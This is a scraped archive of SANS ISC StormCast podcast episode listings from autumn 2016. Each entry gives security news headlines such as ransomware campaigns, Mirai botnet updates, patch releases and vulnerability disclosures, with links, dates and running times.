CSP Bypass with Polyglot Images http://blog.portswigger.net/2016/12/bypassing-csp-using-polyglot-jpegs.html also see this YouTube video on Polyglot Images: https://www.youtube.com/watch?v=Ub5G_t-gUBc Stack Overflow SQL Injection Questions https://laurent22.github.io/so-injections/ Mirai Update: More Outages and Vulnerable Chipset Identified http://www.theregister.co.uk/2016/12/02/broadband_mirai_takedown_analysis/ SEC503 Intrusion Detection in Depth in Brussels (Jan 2017): https://www.sans.org/event/brussels-winter-2017/course/intrusion-detection-in-depth
12/4/2016, 5 minutes, 24 seconds

ISC StormCast for Friday, December 2nd 2016

Open Source Tool "Beamgun" Fights Rogue USB Devices on Windows https://github.com/JLospinoso/beamgun "Shamoon" Malware is back with a new destructive attack against Saudi Arabia https://www.bloomberg.com/news/articles/2016-12-01/destructive-hacks-strike-saudi-arabia-posing-challenge-to-trump British ISP "KCOM" Suffering Outage After Attack http://www.hulldailymail.co.uk/kcom-blames-cyber-attack-for-thousands-losing-internet-access-in-hull/story-29944084-detail/story.html#xf23rtZbUqlh5uXY.99 Microsoft Fixes Long Known Privilege Escalation Issue https://threatpost.com/microsoft-silently-fixes-kernel-bug-that-led-to-chrome-sandbox-bypass/122179/
12/2/2016, 5 minutes, 11 seconds

ISC StormCast for Thursday, December 1st 2016

Mozilla Patches Firefox 0-Day (Exploit already available!) https://isc.sans.edu/forums/diary/Unpatched+Vulnerability+in+Firefox+used+to+Attack+Tor+Browser/21769/ SQL Slammer "Resurgence"? https://isc.sans.edu/forums/diary/Take+Back+Wednesday+SQL+Slammer+still+alive+but+barely+kicking/21767/ Gooligan Android Malware http://blog.checkpoint.com/2016/11/30/1-million-google-accounts-breached-gooligan/ Bypassing SAML 2.0 SSO http://research.aurainfosec.io/bypassing-saml20-SSO/ Webcast: The Six Most Dangerous New Cyber Attack Techniques https://cc.readytalk.com/registration/#/?meeting=9yq9nbx4tp7a&campaign=nggmjhc39guc
11/30/2016, 6 minutes, 27 seconds

ISC StormCast for Wednesday, November 30th 2016

Mirai/TR-069 Update: Deutsche Telekom Routers May have been DDoSed by Traffic Volume, not Exploit https://comsecuris.com/blog/posts/were_900k_deutsche_telekom_routers_compromised_by_mirai/ Bitlocker Encrypted Drives Exposed During System Upgrade http://blog.win-fu.com/2016/11/every-windows-10-in-place-upgrade-is.html Software-Only Defenses Against Rowhammer https://arxiv.org/abs/1611.08396
11/29/2016, 5 minutes, 54 seconds

ISC StormCast for Tuesday, November 29th 2016

Mirai Variant Scanning Port 5555 and 7547 For TR-069/SOAP Vulnerability https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759/ Paypal OAuth Vulnerability http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html
11/29/2016, 5 minutes, 56 seconds

ISC StormCast for Monday, November 28th 2016

Extracting Shellcode from JavaScript https://isc.sans.edu/forums/diary/Extracting+Shellcode+From+JavaScript/21753/ Using Scapy to Test CozyDuke Snort Signatures https://isc.sans.edu/forums/diary/Scapy+vs+CozyDuke/21755/ Malicious JPEG Spreading via Facebook http://blog.checkpoint.com/2016/11/24/imagegate-check-point-uncovers-new-method-distributing-malware-images/ San Francisco Public Transport ("MUNI") hit by Ransomware http://sanfrancisco.cbslocal.com/2016/11/26/you-hacked-cyber-attackers-crash-muni-computer-system-across-sf/ Tesla Smartphone App Vulnerability https://promon.co/blog/tesla-cars-can-be-stolen-by-hacking-the-app/
11/28/2016, 6 minutes, 20 seconds

ISC StormCast for Wednesday, November 23rd 2016

WordPress RCE Via Fake Updates http://www.openwall.com/lists/oss-security/2016/11/21/3 Turning Speakers into Microphones http://cyber.bgu.ac.il/advanced-cyber/system/files/SPEAKEaR.pdf 5 Second Video iOS Crash http://www.cultofmac.com/455215/455215/ "Stubby" Implements Encrypted DNS http://www.theregister.co.uk/2016/11/22/dns_boffins_offer_up_privacy_test/
11/23/2016, 6 minutes, 43 seconds

ISC StormCast for Tuesday, November 22nd 2016

Encrypted ZIP File With Comments https://isc.sans.edu/forums/diary/ZIP+With+Comment/21737/ Siemens Surveillance Cameras Use Static Default Password https://ics-cert.us-cert.gov/advisories/ICSA-16-322-01 NTP Single Packet DoS Vulnerability http://dumpco.re/cve-2016-7434/ Windows 10 Does Not Provide the Same Protections as EMET https://insights.sei.cmu.edu/cert/2016/11/windows-10-cannot-protect-insecure-applications-like-emet-can.html
11/21/2016, 5 minutes, 20 seconds

ISC StormCast for Monday, November 21st 2016

Converting Timestamps with Epocalypse https://isc.sans.edu/forums/diary/How+many+Epoch+times+Epocalypsepy+timestamp+converter/21733/ SIP Disabled on Some Macbook Pros http://www.macrumors.com/2016/11/17/system-integrity-protection-disabled-macbook-pro/ Spoofing Microsoft.com E-Mails with Outlook.com https://www.utkusen.com/blog/sending-valid-phishing-emails-from-microsoftcom.html Various High Profile Twitter Accounts Hijacked By Spammers https://www.engadget.com/2016/11/19/spammers-compromised-twitter-accounts-for-playstation-and-other/ Dyn Attack Caused by Single Angry Playstation User http://www.wsj.com/articles/october-internet-attack-targeted-playstation-network-researchers-say-1479250847
11/21/2016, 5 minutes, 59 seconds

ISC StormCast for Friday, November 18th 2016

Phishers Protect Phishing Sites from Security Researchers https://isc.sans.edu/forums/diary/Example+of+Getting+Analysts+Researchers+Away/21721/ Fedora / Chrome Automatic Downloads and Code Execution https://scarybeastsecurity.blogspot.de/2016/11/0day-poc-risky-design-decisions-in.html Volutility Version 1.0 Released https://techanarchy.net/2016/11/volutility-version-1-0-release/ iOS Synchronizing Call Logs via iCloud http://www.forbes.com/sites/thomasbrewster/2016/11/17/iphone-call-logs-in-icloud-warns-elcomsoft-hackers/#5d96b21c2936
11/18/2016, 5 minutes, 44 seconds

ISC StormCast for Thursday, November 17th 2016

Russian Malspam Distributing Troldesh Ransomware https://isc.sans.edu/forums/diary/Malspam+distributing+Troldesh+ransomware/21717/ Poisontap Exploits USB Ethernet Adapters https://samy.pl/poisontap/ Symantec Patches Untrusted DLL Loading Vulnerability https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20161115_00 VMware Patches VM Escape Vulnerability http://www.vmware.com/security/advisories/VMSA-2016-0019.html Some Android Phones Leak Data To China http://www.prnewswire.com/news-releases/kryptowire-discovered-mobile-phone-firmware-that-transmitted-personally-identifiable-information-pii-without-user-consent-or-disclosure-300362844.html Jacksonville ISC2 Meeting https://www.eventbrite.com/e/isc2-ne-florida-chapter-meeting-november-2016-tickets-29050701430
11/17/2016, 6 minutes, 2 seconds

ISC StormCast for Wednesday, November 16th 2016

Vulnerability in LUKS Can Be used to Boot Encrypted Linux Systems http://betanews.com/2016/11/15/linux-security-bug-cryptsetup-luks/ Shazam Keeps Microphone Turned on Even While not "Listening" https://objective-see.com/blog/blog_0x13.html nginx Privilege Escalation Vulnerability (Debian Only) http://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
11/16/2016, 5 minutes, 52 seconds

ISC StormCast for Tuesday, November 15th 2016

Indictment for the theft of FIFA Game Coins https://regmedia.co.uk/2016/11/14/fifafraudindictment.pdf Crysis Ransomware Master Encryption Key Released http://www.bleepingcomputer.com/news/security/master-decryption-keys-and-decryptor-for-the-crysis-ransomware-released-/ Adult Friend Finder Breached https://www.leakedsource.com/blog/friendfinder Lightbulb Web Application Firewall Auditing Framework http://seclist.us/lightbulb-is-an-open-source-python-framework-for-auditing-web-applications-firewalls.html
11/15/2016, 5 minutes, 20 seconds

ISC StormCast for Monday, November 14th 2016

EMET Will Defeat Shell Code Executing Inside Word https://isc.sans.edu/forums/diary/VBA+Shellcode+and+EMET/21705/ Bitcoin Miners Distributed via FTP Exploits https://isc.sans.edu/forums/diary/Bitcoin+Miner+File+Upload+via+FTP/21707/ 5 Russian Banks Suffer DoS Attack https://www.rt.com/news/366172-russian-banks-ddos-attack/ Wifi May Reveal Mobile Phone Passwords http://dl.acm.org/citation.cfm?id=2978397
11/14/2016, 5 minutes, 29 seconds

ISC StormCast for Friday, November 11th 2016

ICMP Unreachable DoS Attacks https://isc.sans.edu/forums/diary/ICMP+Unreachable+DoS+Attacks+aka+Black+Nurse/21699/ OpenSSL 1.1.0 Patch https://www.openssl.org/news/secadv/20161110.txt OWASP ModSecurity Core Rule Set Version 3.0.0 Release https://lists.owasp.org/pipermail/owasp-modsecurity-core-rule-set/2016-November/002265.html
11/11/2016, 6 minutes, 11 seconds

ISC StormCast for Thursday, November 10th 2016

DoS Attack Turns off Heat for More than a Week http://www.hs.fi/kotimaa/a1478495966653 (Finnish only) D-Link HNAP Vulnerability https://raw.githubusercontent.com/pedrib/PoC/master/advisories/dlink-hnap-login.txt PoC Exploits Available for Two Microsoft Vulnerabilities https://github.com/tinysec/public/tree/master/CVE-2016-7255 https://g-laurent.blogspot.com/2016/11/ms16-137-lsass-remote-memory-corruption.html OpenSSL Patch Pre-Announced https://mta.openssl.org/pipermail/openssl-announce/2016-November/000085.html Hue Lightbulb Exploit/Worm http://iotworm.eyalro.net (Sophos labels this link as "Spam", but it appears to be harmless)
11/9/2016, 5 minutes, 27 seconds

ISC StormCast for Wednesday, November 9th 2016

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/November+2016+Microsoft+Patch+Day/21689/ Adobe Updates https://helpx.adobe.com/security/products/connect/apsb16-35.html https://helpx.adobe.com/security/products/flash-player/apsb16-37.html
11/8/2016, 7 minutes, 29 seconds

ISC StormCast for Tuesday, November 8th 2016

Tesco Bank Limits Online Banking After Online Criminal Activity https://yourcommunity.tescobank.com/t5/News/Message-for-Current-Account-customers/td-p/6599 Belkin WeMo Devices Used To Attack Mobile Devices https://www.blackhat.com/eu-16/briefings/schedule/index.html#breaking-bhad-abusing-belkin-home-automation-devices-4640 Fake Retail Apps Flooding Apple App Store http://www.nytimes.com/2016/11/07/technology/more-iphone-fake-retail-apps-before-holidays.html?_r=0 Netflix Password Recovery via Phone Call Vulnerability https://slashcrypto.org/2016/11/07/Netflix/ Webcast: 8 Ways To Watch The Invisible: Analyzing Encrypted Network Traffic https://www.sans.org/webcasts/8-ways-watch-invisible-analyzing-encrypted-network-traffic-103277
11/8/2016, 6 minutes, 18 seconds

ISC StormCast for Monday, November 7th 2016

Hancitor Maldoc Bypasses Application Whitelisting https://isc.sans.edu/forums/diary/Hancitor+Maldoc+Bypasses+Application+Whitelisting/21683/ Microsoft Extends EMET Support Deadline https://blogs.technet.microsoft.com/srd/2016/11/03/beyond-emet/ Wifi Based IMSI Catcher https://www.blackhat.com/docs/eu-16/materials/eu-16-OHanlon-WiFi-IMSI-Catcher.pdf
11/7/2016, 5 minutes, 44 seconds

ISC StormCast for Friday, November 4th 2016

Reconstruct Binaries Sent via Telnet https://isc.sans.edu/forums/diary/Extracting+Malware+Transmitted+Via+Telnet/21673/ Wix.com DOM Based XSS https://www.contrastsecurity.com/security-influencers/dom-xss-in-wix.com DNS Based Mail Security https://nccoe.nist.gov/projects/building_blocks/secured_email Web of Trust Plugin Released Anonymized User Data https://www.mywot.com/en/forum/70396--virus-spyware-do-not-install-uninstall-as-soon-as-possible
11/3/2016, 6 minutes, 53 seconds

ISC StormCast for Thursday, November 3rd 2016

Exchange Web Service Two-Factor Authentication Bypass http://www.blackhillsinfosec.com/?p=5396 Barracuda DoS Disrupts Mail Delivery http://status.barracuda.com Targobank Loses Account Data After Maintenance http://www.spiegel.de/wirtschaft/service/targobank-kunden-fehlt-geld-auf-dem-konto-it-probleme-a-1119434.html (German only) Ouch! Security Awareness Newsletter http://securingthehuman.sans.org/newsletters/ouch/issues/OUCH-201611_en.pdf
11/3/2016, 5 minutes, 48 seconds

ISC StormCast for Wednesday, November 2nd 2016

Malvertising On Google AdWords Targeting macOS Users http://blog.cylance.com/malvertising-on-google-adwords-targeting-macos-users Microsoft Response to Google Privilege Escalation Disclosure https://blogs.technet.microsoft.com/mmpc/2016/11/01/our-commitment-to-our-customers-security/ Memcached Remote Code Execution Vulnerabilities http://blog.talosintel.com/2016/10/memcached-vulnerabilities.html SAP Vulnerability Details Released https://erpscan.com/press-center/blog/0-day-sap-vulnerability-published-heres-can/
11/2/2016, 5 minutes, 50 seconds

ISC StormCast for Tuesday, November 1st 2016

snapshot.ps1 DFIR Capture https://isc.sans.edu/forums/diary/SEC505+DFIR+capture+script+snapshotps1/21659/ Predicting Domain Reputation http://www.icir.org/vern/papers/predator-ccs16.pdf Mozilla Removing Battery Status API For Privacy Reasons https://www.fxsitecompat.com/en-CA/docs/2016/battery-status-api-has-been-removed/ Windows Privilege Escalation 0-day Actively Exploited https://security.googleblog.com/2016/10/disclosing-vulnerabilities-to-protect.html
11/1/2016, 5 minutes, 56 seconds

ISC StormCast for Monday, October 31st 2016

Volatility Bot: Automated Memory Analysis https://isc.sans.edu/forums/diary/Volatility+Bot+Automated+Memory+Analysis/21655/ 911 System Fragility Exposed in Accidental DoS Attacks https://staging.mcso.org/Multimedia/PressRelease/911%20Cyber%20Attack.pdf Vulnerability in Mirai Botnet https://www.invincealabs.com/blog/2016/10/killing-mirai/ XNU Kernel (iOS/macOS) task_t Privilege Escalation https://googleprojectzero.blogspot.de/2016/10/taskt-considered-harmful.html
10/31/2016, 6 minutes, 44 seconds

ISC StormCast for Friday, October 28th 2016

Small Changes to Ransomware E-Mails May Fool Some Mail Filters https://isc.sans.edu/forums/diary/Your+Bill+Is+Not+Overdue+today/21647/ Microsoft / Google Release Browser Updates to Address Flash Vulnerability https://technet.microsoft.com/en-us/library/security/ms16-128.aspx https://googlechromereleases.blogspot.com Social Media "Support" Phishing https://www.proofpoint.com/us/corporate-blog/post/cybercriminals-spoof-every-major-bank-masquerade-branded-customer-service-twitter-accounts Path Traversal Vulnerability in GNU tar https://sintonen.fi/advisories/tar-extract-pathname-bypass.proper.txt Podcast Survey https://dshield.typeform.com/to/lVgHr5
10/27/2016, 6 minutes, 35 seconds

ISC StormCast for Thursday, October 27th 2016

Adobe Releases Emergency Patch For Flash https://isc.sans.edu/forums/diary/Critical+Flash+Player+Update+APSB1636/21643/ Mobile Pwn2Own Writeup http://blog.trendmicro.com/results-mobile-pwn2own-2016/ Mozilla Will Stick With Blacklisting Startcom/WoSign https://blog.mozilla.org/security/2016/10/24/distrusting-new-wosign-and-startcom-certificates/ Joomla Exploit Released https://medium.com/@showthread/joomla-3-6-4-account-creation-elevated-privileges-write-up-and-exploit-965d8fb46fa2#.b8gks1jar Google Spreadsheet Vulnerability https://www.rodneybeede.com/Google_Spreadsheet_Vuln_-_CSRF_and_JSON_Hijacking_allows_data_theft.html
10/26/2016, 6 minutes, 2 seconds

ISC StormCast for Wednesday, October 26th 2016

Joomla Fixes Two Critical Vulnerabilities https://www.joomla.org/announcements/release-news/5678-joomla-3-6-4-released.html Letsencrypt Domain Verification Problem https://dan.enigmabridge.com/lets-encrypts-vulnerability-as-a-feature-authz-reuse-and-eternal-account-key/ New Locky Variants: Pumpkin Locky http://blog.talosintel.com/2016/10/pumpkin-locky.html Pagers Still in Use for Critical Infrastructure http://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/industrial-plant-beepers-leaking-secrets
10/26/2016, 5 minutes, 16 seconds

ISC StormCast for Tuesday, October 25th 2016

Updates For iOS, MacOS, Safari https://support.apple.com/en-us/HT201222 LTE Intercept Vulnerability http://www.theregister.co.uk/2016/10/23/every_lte_call_text_can_be_intercepted_blacked_out_hacker_finds/ Rowhammer Exploit Demonstrated Against Android https://www.vusec.net/projects/drammer/
10/25/2016, 6 minutes, 36 seconds

ISC StormCast for Monday, October 24th 2016

ISC Briefing: Large DDoS Attack Against Dyn https://isc.sans.edu/forums/diary/ISC+Briefing+Large+DDoS+Attack+Against+Dyn/21627/ TCP Port 4786: Cisco Memory Leak Vulnerability https://isc.sans.edu/forums/diary/Request+for+Packets+TCP+4786+CVE20166385/21625/ Dirty Cow PoC Exploits Available https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs To register for today's SANS Technology Institute Professional Lecture Series, please e-mail [email protected]
10/23/2016, 7 minutes, 22 seconds

ISC StormCast for Friday, October 21st 2016

NanoCore RAT Malspam Update https://isc.sans.edu/forums/diary/Malspam+delivers+NanoCore+RAT/21615/ Dirty Cow Privilege Escalation Flaw https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c13 Lexmark Markvision Enterprise Application Vulnerability https://www.digitaldefense.com/blog-zero-day-lexmark-markvision/ WebRTC Security Overview https://webrtc-security.github.io UPnP Scanner https://www.tenable.com/blog/do-you-know-where-your-upnp-is
10/20/2016, 6 minutes, 5 seconds

ISC StormCast for Thursday, October 20th 2016

Spam Delivered Via .ICS Files https://isc.sans.edu/forums/diary/Spam+Delivered+via+ICS+Files/21611/ Comodo OCR Errors Lead to SSL Certificate Verification Issues https://heise.de/-3354229 (German only) Oracle Quarterly Critical Patch Update http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html Images Used to Exfiltrate CC Numbers From Web Stores https://blog.sucuri.net/2016/10/magento-credit-card-swiper-exports-image.html
10/19/2016, 5 minutes, 45 seconds

ISC StormCast for Wednesday, October 19th 2016

SSL Client Hellos Soliciting SSH Banners from HAProxy https://isc.sans.edu/forums/diary/OpenSSH+Protocol+Mismatch+In+Response+to+SSL+Client+Hello/21609/ Dyre is Back as Trickbot http://www.threatgeek.com/2016/10/trickbot-the-dyre-connection.html How Stolen iPhones Are Unlocked https://www.linkedin.com/pulse/sin-card-how-criminals-unlocked-stolen-iphone-6s-renato-marinho?trk=pulse_spock-articles
10/19/2016, 6 minutes, 48 seconds

ISC StormCast for Tuesday, October 18th 2016

Mozilla Users Reach 50% HTTPS https://twitter.com/0xjosh/status/786971412959420424/photo/1 Retrieving LastPass Passwords From Memory https://techanarchy.net/2016/10/extracting-lastpass-site-credentials-from-memory/ Yahoo MITM Due To Weak crossdomain.xml Configuration https://github.com/JordanMilne/YMail-Pineapple
10/17/2016, 5 minutes, 20 seconds

ISC StormCast for Monday, October 17th 2016

pseudoDarkleech Uses Rig Exploit Kit to Spread Cerber https://isc.sans.edu/forums/diary/pseudoDarkleech+Rig+EK/21595/ Decoder.xls to Decode Malicious Word Macros https://isc.sans.edu/forums/diary/Analyzing+Office+Maldocs+With+Decoderxls/21601/ Auditing SSH Servers https://github.com/arthepsy/ssh-audit How Not To Use HTML Purifier https://devwerks.net/blog/16/how-not-to-use-html-purifier/
10/16/2016, 5 minutes, 31 seconds

ISC StormCast for Friday, October 14th 2016

Mount Docker Filesystems with docker-mount.py https://isc.sans.edu/forums/diary/New+tool+dockermountpy/21589/ GlobalSign OCSP Mess Up Invalidates Countless Certs https://downloads.globalsign.com/acton/fs/blocks/showLandingPage/a/2674/p/p-008f/t/page/fm/0 Cisco Releases LockyDump http://blog.talosintel.com/2016/10/lockydump.html Google Updates Chrome https://googlechromereleases.blogspot.com/2016/10/stable-channel-update-for-desktop.html DXXD Ransomware Infects Unmapped Shares http://www.bleepingcomputer.com/news/security/the-dxxd-ransomware-displays-legal-notice-before-users-login/
10/14/2016, 5 minutes, 30 seconds

ISC StormCast for Thursday, October 13th 2016

WiFi Still Remains a Good Attack Vector https://isc.sans.edu/forums/diary/WiFi+Still+Remains+a+Good+Attack+Vector/21583/ AVTECH IP Camera Vulnerabilities http://seclists.org/bugtraq/2016/Oct/26 SAP Patches 3 Year Old Bug in P4 https://erpscan.com/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/ 1024 bit DSA Keys Factored https://eprint.iacr.org/2016/961.pdf
10/12/2016, 6 minutes, 13 seconds

ISC StormCast for Wednesday, October 12th 2016

Microsoft and Adobe Patches https://isc.sans.edu/mspatchdays.html?viewday=2016-10-11 https://helpx.adobe.com/security/products/acrobat/apsb16-33.html http://www.minixforum.com/threads/neo-z64w-doesnt-start-anymore-after-windows-10-update-help.14122/ Review of Browsers SSL Failures https://docs.google.com/document/d/1b7lenmn5XO06QohaJzVffnJxjXjY1rD70wg34gfuxRo/edit#heading=h.w6vk76mv9e6n New Malware Targeting SWIFT Users http://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks
10/11/2016, 5 minutes, 58 seconds

ISC StormCast for Tuesday, October 11th 2016

Radare2's rahash2 Utility Can Calculate File Entropy https://isc.sans.edu/forums/diary/Radare2+rahash2/21577/ Spoofing IPs Still Works https://idea.popcount.org/2016-09-20-strange-loop---ip-spoofing/ EU Commission Plans IoT Labeling http://www.euractiv.com/section/innovation-industry/news/commission-plans-cybersecurity-rules-for-internet-connected-machines/
10/11/2016, 3 minutes, 29 seconds

ISC StormCast for Monday, October 10th 2016

First Hurricane Matthew Phish Impersonating Stripe https://isc.sans.edu/forums/diary/First+Hurricane+Matthew+related+Phish/21571/ Samsung Galaxy S6 "KNOXOut" Vulnerability http://media.wix.com/ugd/4e84e6_668d564cc447434a9a8fda3c13a63f6a.pdf Windows 10 Anniversary Edition Improves IE 10 XSS Protection http://mksben.l0.cm/2016/10/xss-via-referrer.html
10/9/2016, 5 minutes, 9 seconds

ISC StormCast for Friday, October 7th 2016

More Honeypot Fun https://isc.sans.edu/forums/diary/Checking+my+honeypot+day/21561/ OS X Webcam Exploit https://objective-see.com/products/oversight.html iOS 10 Private Browsing https://www.intaforensics.com/2016/09/30/ios-10-private-browsing-how-private-is-it/ Hacked Steam Accounts Used to Spread Malware http://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/ Please Report Any Hurricane Matthew Related Malware/Scams https://isc.sans.edu/contact.html
10/7/2016, 5 minutes, 41 seconds

ISC StormCast for Thursday, October 6th 2016

Securing the Human Newsletter https://securingthehuman.sans.org/newsletters/ouch/issues/OUCH-201610_en.pdf "Security Fatigue" https://www.nist.gov/news-events/news/2016/10/security-fatigue-can-cause-computer-users-feel-hopeless-and-act-recklessly "Selfie Pay" Facial Recognition http://www.theregister.co.uk/2016/10/05/mastercard_selfie_pay/ "MarsJoke" Ransomware Decrypted https://threatpost.com/researchers-break-marsjoke-ransomware-encryption/121022/
10/6/2016, 5 minutes, 40 seconds

ISC StormCast for Wednesday, October 5th 2016

SSL Requests to Non-SSL Web Servers https://isc.sans.edu/forums/diary/SSL+Requests+to+nonSSL+HTTP+Servers/21551/ Insulin Pump Vulnerabilities https://community.rapid7.com/community/infosec/blog/2016/10/04/r7-2016-07-multiple-vulnerabilities-in-animas-onetouch-ping-insulin-pump SSH Konami Codes http://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences Cyber Security Awareness Month https://securingthehuman.sans.org/blog/2016/10/02/week01-kicking-off-ncsam/ OpenJPEG Flaw http://blog.talosintel.com/2016/09/vulnerability-spotlight-jpeg2000.html
10/5/2016, 5 minutes, 32 seconds

ISC StormCast for Tuesday, October 4th 2016

Password Buddies https://isc.sans.edu/forums/diary/Password+Buddies+A+Better+Way+To+Reset+Passwords/21547/ iMessage Data Leakage http://rsmck.co.uk/blog/imessage-preview/ Exploiting HP Thin Client http://blog.malerisch.net/2016/10/pwning-thin-client-in-less-two-minutes2-cve2016-2246.html
10/4/2016, 5 minutes, 43 seconds

ISC StormCast for Monday, October 3rd 2016

The Short Life of a Vulnerable DVR Connected to the Internet https://isc.sans.edu/forums/diary/The+Short+Life+of+a+Vulnerable+DVR+Connected+to+the+Internet/21543/ Another Day, Another Malicious Behaviour https://isc.sans.edu/forums/diary/Another+Day+Another+Malicious+Behaviour/21539/ Capcom's Street Fighter V Anti-Cheat Tool Allows Privilege Escalation https://twitter.com/TheWack0lian/status/779397840762245124/photo/1?ref_src=twsrc%5Etfw Apple Joins Mozilla In Distrusting WoSign https://groups.google.com/forum/#!topic/mozilla.dev.security.policy/lWJ1zdUJPLI "Footprints" Browser Extension Demonstrates Unmasking a User's Identity https://footprints.stanford.edu
10/3/2016, 6 minutes, 2 seconds

ISC StormCast for Friday, September 30th 2016

Turning the Lights Off with SNMP https://isc.sans.edu/forums/diary/SNMP+Pwn3ge/21533/ Yahoo! Answers Used in Command and Control Networks http://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/ D-Link Router Includes Stupid Simple UDP Backdoor https://pierrekim.github.io/blog/2016-09-28-dlink-dwr-932b-lte-routers-vulnerabilities.html Hikvision XXE Vulnerability https://medium.com/@iraklis/an-unlikely-xxe-in-hikvisions-remote-access-camera-cloud-d57faf99620f#.qukzihoew
9/30/2016, 5 minutes, 23 seconds

ISC StormCast for Thursday, September 29th 2016

Rig Exploit Kit Used to Spread Locky Ransomware https://isc.sans.edu/forums/diary/Rig+Exploit+Kit+from+the+Afraidgate+Campaign/21531/ Facebook Releases osquery for Windows https://blog.trailofbits.com/2016/09/27/windows-network-security-now-easier-with-osquery/ Update Cowrie and "New" Default Password used in Internet Wide Scans https://isc.sans.edu/ssh.html?pw=xc3511 BIND Name Server Update https://kb.isc.org/article/AA-01393/74/CVE-2016-2775%3A-A-query-name-which-is-too-long-can-cause-a-segmentation-fault-in-lwresd.html Various Cisco DoS Vulnerabilities https://tools.cisco.com/security/center/publicationListing.x?product=NonCisco#~Vulnerabilities
9/28/2016, 5 minutes, 7 seconds

ISC StormCast for Wednesday, September 28th 2016

Back in Time Memory Forensics https://isc.sans.edu/forums/diary/Back+in+Time+Memory+Forensics/21527/ Cameras Responsible For Large DDoS Attacks https://twitter.com/olesovhcom/status/779297257199964160 Google Releases CSP Support Tools https://csp-evaluator.withgoogle.com https://chrome.google.com/webstore/detail/csp-mitigator Microsoft Launches "fuzzing-as-a-service" https://www.microsoft.com/en-us/springfield/
9/28/2016, 5 minutes, 8 seconds

ISC StormCast for Tuesday, September 27th 2016

Decompiling P-Code https://isc.sans.edu/forums/diary/VBA+and+Pcode/21521/ Lenovo To Add FIDO Compliant Fingerprint Reader http://www.theregister.co.uk/2016/09/26/intel_and_lenovo_give_the_finger_to_passwords_with_fido/ More Details On Simpler Password Hashing in iOS 10 https://twitter.com/thorsheim/status/779207177416351744 Mozilla to Remove WoSign and StartCom From Trusted List https://docs.google.com/document/d/1C6BlmbeQfn4a9zydVi2UvjBGv6szuSB4sMYUcVrR8vQ/preview
9/26/2016, 6 minutes, 7 seconds

ISC StormCast for Monday, September 26th 2016

Analyzing Malicious .PUB files https://isc.sans.edu/forums/diary/PUB+Analysis/21517/ iOS 10 Backup Passwords Easier to Crack http://blog.elcomsoft.com/2016/09/ios-10-security-weakness-discovered-backup-passwords-much-easier-to-break/ Windows 10 Certificate Pinning of Microsoft Domains http://hexatomium.github.io/2016/09/24/hidden-w10-pins/ IBM Geoblocking Fail For Australian Census http://www.aph.gov.au/DocumentStore.ashx?id=124f22ba-caaa-46ff-899d-7d96851fee3e&subId=414127 97% Of Fortune 1000 Companies Have Leaked Credentials http://info.digitalshadows.com/rs/457-XEY-671/images/CompromisedCredentials-LearnFromtheExposureoftheWorlds1000BiggestCompanies-Download.pdf
9/26/2016, 5 minutes, 42 seconds

ISC StormCast for Friday, September 23rd 2016

OpenSSL Security Update https://isc.sans.edu/forums/diary/OpenSSL+Update+Released/21509/ ATM Skimmer Prototypes To Collect Fingerprints https://securelist.com/files/2016/09/16_09_en.pdf Yahoo! Breach Leaks 500M Users' Data https://yahoo.tumblr.com/post/150781911849/an-important-message-about-yahoo-user-security
9/22/2016, 5 minutes, 25 seconds

ISC StormCast for Thursday, September 22nd 2016

Those Never-Ending Waves of Locky Malspam https://isc.sans.edu/forums/diary/Those+neverending+waves+of+Locky+malspam/21505/ Windows Antimalware Scan Interface (AMSI) http://www.labofapenetrationtester.com/2016/09/amsi.html Cloudflare Introducing SSL Re-Write https://blog.cloudflare.com/opportunistic-encryption-bringing-http-2-to-the-unencrypted-web/ Australian Police Warn of Malicious USB Sticks https://www.vicpolicenews.com.au/news/harmful-usb-drives-found-in-letterboxes
9/21/2016, 5 minutes, 54 seconds

ISC StormCast for Wednesday, September 21st 2016

macOS Sierra and Safari 10 Released https://isc.sans.edu/forums/diary/Getting+Ready+for+macOS+Sierra+Upgrade+Securely/21465/ BackConnect BGP Hijacks http://research.dyn.com/2016/09/backconnects-suspicious-bgp-hijacks/ Metasploit Vulnerability https://github.com/justinsteven/advisories/blob/master/2016_metasploit_rce_static_key_deserialization.md
9/21/2016, 4 minutes, 57 seconds
ISC StormCast for Tuesday, September 20th 2016

Taking Over Facebook Pages http://arunsureshkumar.me/index.php/2016/09/16/facebook-page-takeover-zero-day-vulnerability/
Exchange Auto-Discovery Vulnerability http://www.theregister.co.uk/2016/09/19/ms_exchange_alleged_bug/
Spyware Apps Targeting Travelers Removed From Google App Store https://blog.lookout.com/blog/2016/09/16/embassy-spyware-google-play/
Firefox Will Patch HSTS Vulnerability https://threatpost.com/mozilla-patching-firefox-certificate-pinning-vulnerability/120694/
OpenSSL Patch Pre-Announcement https://mta.openssl.org/pipermail/openssl-announce/2016-September/000076.html
9/20/2016, 5 minutes, 39 seconds
ISC StormCast for Monday, September 19th 2016

Cisco Issues Advisories for IKEv1 "heartbleed like" Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160916-ikev1
Intercepting OS X Passwords https://www.scriptjunkie.us/2016/09/intercepting-passwords-to-escalate-privileges-on-os-x/
Vulnerabilities Introduced By Converting 32 Bit to 64 Bit https://www.tu-braunschweig.de/Medien-DB/sec/pubs/2016-ccs.pdf
HSTS Preload Database and Webservices https://hstspreload.com
9/19/2016, 7 minutes, 16 seconds
ISC StormCast for Friday, September 16th 2016

Locky Ransomware Updates https://blog.avira.com/locky-ransomware-goes-autopilot/ https://blogs.forcepoint.com/security-labs/locky-distributor-uses-newly-released-quant-loader-sold-russian-underground https://isc.sans.edu/forums/diary/Is+2+out+of+3+good+enough+for+AntiMalware/21485/
